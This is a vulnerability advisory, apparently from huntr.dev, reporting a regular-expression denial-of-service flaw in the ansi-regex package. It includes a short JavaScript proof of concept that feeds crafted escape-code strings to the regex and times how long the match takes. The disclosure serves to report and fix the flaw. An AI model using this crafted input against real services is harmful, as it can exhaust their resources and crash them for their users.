Lucene search

K
huntrYetingli5B3CF33B-EDE0-4398-9974-800876DFD994
HistorySep 09, 2021 - 11:25 a.m.

Inefficient Regular Expression Complexity in chalk/ansi-regex

2021-09-0911:25:39
yetingli
www.huntr.dev
88

0.004 Low

EPSS

Percentile

73.6%

✍️ Description

It allows cause a denial of service when matching crafted invalid ANSI escape codes.

🕵️‍♂️ Proof of Concept

// PoC.mjs
import ansiRegex from 'ansi-regex';


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.